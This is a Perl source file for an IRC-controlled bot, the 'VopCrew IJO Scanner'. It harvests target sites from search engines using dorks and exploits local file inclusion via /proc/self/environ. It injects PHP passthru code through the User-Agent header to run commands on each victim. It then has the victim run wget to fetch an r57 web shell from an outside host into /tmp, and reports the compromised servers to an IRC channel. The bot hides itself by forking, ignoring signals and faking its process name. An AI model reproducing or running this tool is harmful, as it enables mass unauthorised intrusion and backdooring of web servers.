#!/usr/bin/perl

#  _______         __         _______               __    
# |   |   |.---.-.|__|.-----.|   |   |.---.-..----.|  |--.
# |       ||  _  ||  ||     ||       ||  _  ||  __||    < 
# |__|_|__||___._||__||__|__||___|___||___._||____||__|__|
#                  MainHack BrotherHood

# LFI Scanner (/proc/self/environ)
############################################
# VopCrew IJO Scanner v1.2                 #
# Coded by Vrs-hCk                         #
# ander[at]antisecurity.org                #
# www.antisecurity.org                     #
# Copyright © 2010 VopCrew UnderGrounD     #
############################################
# perl ijoscan.pl help me !!!              #
############################################

# Greetz to:
# AntiSecurity.org Member, MH BrotherHood, SiD UnderGrounD, VopCrew UnderGrounD, nob0dy Crew
# NoGe, Jack, zxvf, s4va, matthews, Fluzy, aLvRea (selingkuh yuk awkawkakakaw kabor ah ada Jack :p)
# S3T4N, xr00tb0y, bl4Ck_3n91n3, wishnusakti, stardustmemory, dkk (too many :O)

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc  = $ARGV[6];
$ircserver    = $ARGV[0] unless $ircserver;
my $ircport   = $ARGV[1];
my $nickname  = $ARGV[2];
my $ident     = $ARGV[3];
my $channel   = '#'.$ARGV[4];
my $runner    = $ARGV[5];
my $fullname  = '15(7@2VopCrew-IJO-Scanner15)';

my $ijoscan   = '!x';

$ijo_test     = "../../../../../../../../../../../../../../../proc/self/environ%00";
$ijo_shell    = "http://marketlink.uk.net/img/.log/r57";

my $success   = "\n [+] VopCrew IJO Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
my $failed    = "\n [-] perl $0 <host> <port> <botnick> <botident> <botchan> <yournick> <fakeproc>\n\n";

if (@ARGV != 7) { print $failed; exit(); } else { print $success; }

$SIG{'INT'}   = 'IGNORE';
$SIG{'HUP'}   = 'IGNORE';
$SIG{'TERM'}  = 'IGNORE';
$SIG{'CHLD'}  = 'IGNORE';
$SIG{'PS'}    = 'IGNORE';

chdir("/");
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();

sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
        print $IRC_cur_socket "$_[0]\n";
    }
}

sub connector {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
        nick("$mynick");
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep 1;
    }
}

sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
        sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^\001VERSION\001$/) {
            notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
        }
        if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
        }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($mynick)) {
            $mynick=$4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$mynick|".int rand(999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        sendraw("MODE $nickname +Bx");
        sendraw("JOIN $channel");
        sendraw("PRIVMSG $channel :VopCrew IJO Scanner");
        sendraw("PRIVMSG $runner :Hi $runner im here !!!");
    }
}

my $line_temp;
while( 1 ) {
    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $msg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $msg);
        $msg =~ s/\r\n$//;

        #####################################################################
        ############################[ CMD LIST ]#############################
        #####################################################################

        if ($msg=~ /PRIVMSG $channel :!help/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 9,1 $ijoscan <lfibug> <dork> ");
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15) 9,1 !xpl | !engine | !pid | !version | !about ");
        }

        if ($msg=~ /PRIVMSG $channel :!xpl/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Version15)12 Exploit -> 7http://c0li.info/xpl/lfirce.pl ");
        }

        if ($msg=~ /PRIVMSG $channel :!version/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Version15)12 VopCrew IJO Scanner v1.2");
        }

        if ($msg=~ /PRIVMSG $channel :!engine/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Engine15)12 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
        }

        if ($msg=~ /PRIVMSG $channel :!pid/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2PID15)12 Process/ID : 4 $fakeproc - $$");
        }

        if ($msg=~ /PRIVMSG $channel :!about/){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 VopCrew IJO Scanner v1.2");
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Coded by Vrs-hCk - MainHack BrotherHood ");
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)3 Copyright © 2010 VopCrew UnderGrounD");
        }

        ##################################################################### Google Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "GooGLe";
                    my $bugx = $1;
                    my $d0rk = $2;
                    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2VopCrew15)12 Dork :4 $d0rk");
                    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2VopCrew15)12 File :4 $bugx");
                    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2VopCrew15)7 Search Engine Loading ...");
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### AllTheWeb Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "AllTheWeb";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### Bing Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "Bing";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### Altavista Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "ALtaViSTa";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### ASK Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "AsK";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### UoL Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "UoL";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        ##################################################################### Yahoo Engine
        if ($msg=~ /PRIVMSG $channel :$ijoscan\s+(.*?)\s+(.*)/ ) {
            if (my $pid = fork) {
                waitpid($pid, 0);
            }
            else {
                if (fork) {    exit; } else {
                    my $engx = "YahOo";
                    my $bugx = $1;
                    my $d0rk = $2;
                    &lfiscan($engx,$bugx,$d0rk);
                }
                exit;
            }
        }

        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line=$line_temp.$line if ($line_temp);
            $line_temp='';
            $line =~ s/\r$//;
            unless ($c == $#lines) {
                parse("$line");
            } else {
                if ($#lines == 0) {
                    parse("$line");
                } elsif ($lines[$c] =~ /\r$/) {
                    parse("$line");
                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                    parse("$line");
                } else {
                    $line_temp = $line;
                }
            }
        }
    }
}

##################################################################### Procedure

sub lfiscan() {
    my $engz = $_[0];
    my $bugz = $_[1];
    my $dork = $_[2];
    my $contatore = 0;    
    if ($engz =~ /GooGLe/) {
        my @google=&google($dork);
        push(@total, @google);
        }
    if ($engz =~ /AllTheWeb/) {
        my @alltheweb=&alltheweb($dork);
        push(@total, @alltheweb);
    }
    if ($engz =~ /Bing/) {
        my @Bing=&Bing($dork);
        push(@total, @Bing);
    }
    if ($engz =~ /ALtaViSTa/) {
        my @altavista=&altavista($dork);
        push(@total, @altavista);
    }
    if ($engz =~ /AsK/) {
        my @ask=&ask($dork);
        push(@total, @ask);
    }
    if ($engz =~ /UoL/) {
        my @uol=&uol($dork);
        push(@total, @uol);
    }
    if ($engz =~ /YahOo/) {
        my @yahoo=&yahoo($dork);
        push(@total, @yahoo);
    }
    my @clean = &calculate(@total);
    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")");
    if (scalar(@clean) != 0) {
        sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)7 Exploiting4 $dork");
    }
    my $uni=scalar(@clean);
    foreach my $target (@clean)
    {
        $contatore++;
        if ($contatore==$uni-1){
            sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)10 Scan Finish for14 $dork");
        }
        my $lfi  = "../../../../../../../../../../../../../../..";
        my $xpl  = "http://".$target.$bugz.$ijo_test;
        my $vuln = "http://".$target."12".$bugz."7".$ijo_test."";
        my $re   = getcontent($xpl);
        if ($re  =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $ijo = exploit($xpl,"uname -svnrp;echo c0li;id");
                $ijo =~ s/\n//g;
                if ($ijo =~ /c0li#(.*)c0liuid=(.*)#c0li/sg) {
                    my ($sys,$uid) = ($1,$2);
                    my $tmp = "/tmp/shell".int rand(2010);
                    my $upload = exploit($xpl,"wget $ijo_shell -O $tmp"); sleep(1);
                    my $res = getcontent("http://".$target.$bugz.$lfi.$tmp.'%00');
                    if ($res =~ /Hacked by Vrs-hCk/) {
                        sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)15(13@12PHPSheLL15)4 http://".$target."12".$bugz."6".$lfi."7".$tmp."%00 15(7@3".$sys."15)(7@3VopCrew15)");
                    }
                    else {
                        sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)15(13@12System15)4 http://".$target."12".$bugz."6[LFI] 15(7@3".$sys." 7uid=".$uid."15)(7@2VopCrew15)");
                    }
                }
                else {
                    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IJO15)(7@2$engz15)15(13@12Vuln15)4 ".$vuln." 15(7@3VopCrew15)");
                }
            } exit } sleep(3);
        }
    }
}

sub getcontent() {
    my $url = $_[0];
    my $req = HTTP::Request->new(GET => $url);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(10);
    my $response = $ua->request($req);
    return $response->content;
}

sub exploit() {
    my $url = $_[0];
    my $rce = $_[1];
    my $agent = "<?php echo \"c0li#\"; passthru(\'".$rce."\'); echo \"#c0li\"; ?>";
    my $ua = LWP::UserAgent->new(agent => $agent);
    $ua->timeout(10);
    my $req = HTTP::Request->new(GET => $url);
    my $response = $ua->request($req);
    return $response->content;
}

sub google(){
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b=0; $b<=1000; $b+=100){
        my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b);
        my $Res=query($Go);
        while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
            if ($1 !~ /google/){
                my $k=$1;
                my @grep=links($k);
                push(@lst,@grep);
            }
        }
    }
return @lst;
}

sub alltheweb() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    my $pg  = 0;
    for ($b=0; $b<=1000; $b+=100) {
        my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b);
        my $Res = query($all);
        while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
            my $k = $1;
            $k =~ s/ //g;
            my @grep = links($k);
            push( @lst, @grep );
        }
    }
    return @lst;
}

sub uol() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b=1; $b<=1000; $b+=10) {
        my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b);
        my $Res = query($UoL);
        while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
            my $k = $1;
            if ( $k !~ /busca|uol|yahoo/ ) {
                my $k    = $1;
                my @grep = links($k);
                push( @lst, @grep );
            }
        }
    }
    return @lst;
}

sub Bing() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b=1; $b<=1000; $b+=10) {
        my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE");
        my $Res = query($bing);
        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
            if ( $1 !~ /msn|live|bing/ ) {
                my $k    = $1;
                my @grep = links($k);
                push( @lst, @grep );
            }
        }
    }
    return @lst;
}

sub altavista(){
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b=1; $b<=1000; $b+=10){
        my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
        my $Res=query($AlT);
        while ($Res=~m/<span class=ngrn>(.+?)\//g){
            if ($1 !~ /altavista/){
                my $k=$1;
                $k=~s/<//g;
                $k=~s/ //g;
                my @grep=links($k);
                push(@lst,@grep);
            }
        }
    }
return @lst;
}

sub ask() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    my $pg  = 0;
    for ($b=0; $b<=1000; $b+=10) {
        my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
        my $Res = query($Ask);
        while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
            if ($1 !~ /ask.com/){
                my $k = $1;
                my @grep = links($k);
                push( @lst, @grep );
            }
        }
    }
    return @lst;
}

sub yahoo() {
    my @lst;
    my $key = $_[0];
    my $b   = 0;
    for ($b=1; $b<=500; $b+=1) {
        my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
        my $Res = query($yahoo);
        while ($Res =~ m/26u=(.*?)%26w=/g) {
            if ($1 !~ /yahoo/){
                my $k = $1;
                my @grep = links($k);
                push(@lst, @grep);
            }
        }
    }
    return @lst;
}

sub links() {
    my @l;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    $hdir =~ s/(.*)\/[^\/]*$/\1/;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push( @l, $link, $host, $hdir );
    return @l;
}

sub key() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
    return $dork;
}

sub query($) {
    my $url = $_[0];
    $url =~ s/http:\/\///;
    my $host  = $url;
    my $query = $url;
    my $page  = "";
    $host  =~ s/href=\"?http:\/\///;
    $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~ s/$host//;
    if ( $query eq "" ) { $query = "/"; }
        eval {
            my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;
            print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
            my @r = <$sock>;
            $page = "@r";
            close($sock);
        };
    return $page;
}

sub calculate {
    my @calculate = ();
    my %visti = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        next if $visti{$element}++;
        push @calculate, $element;
    }
    return @calculate;
}

sub nick {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}

sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}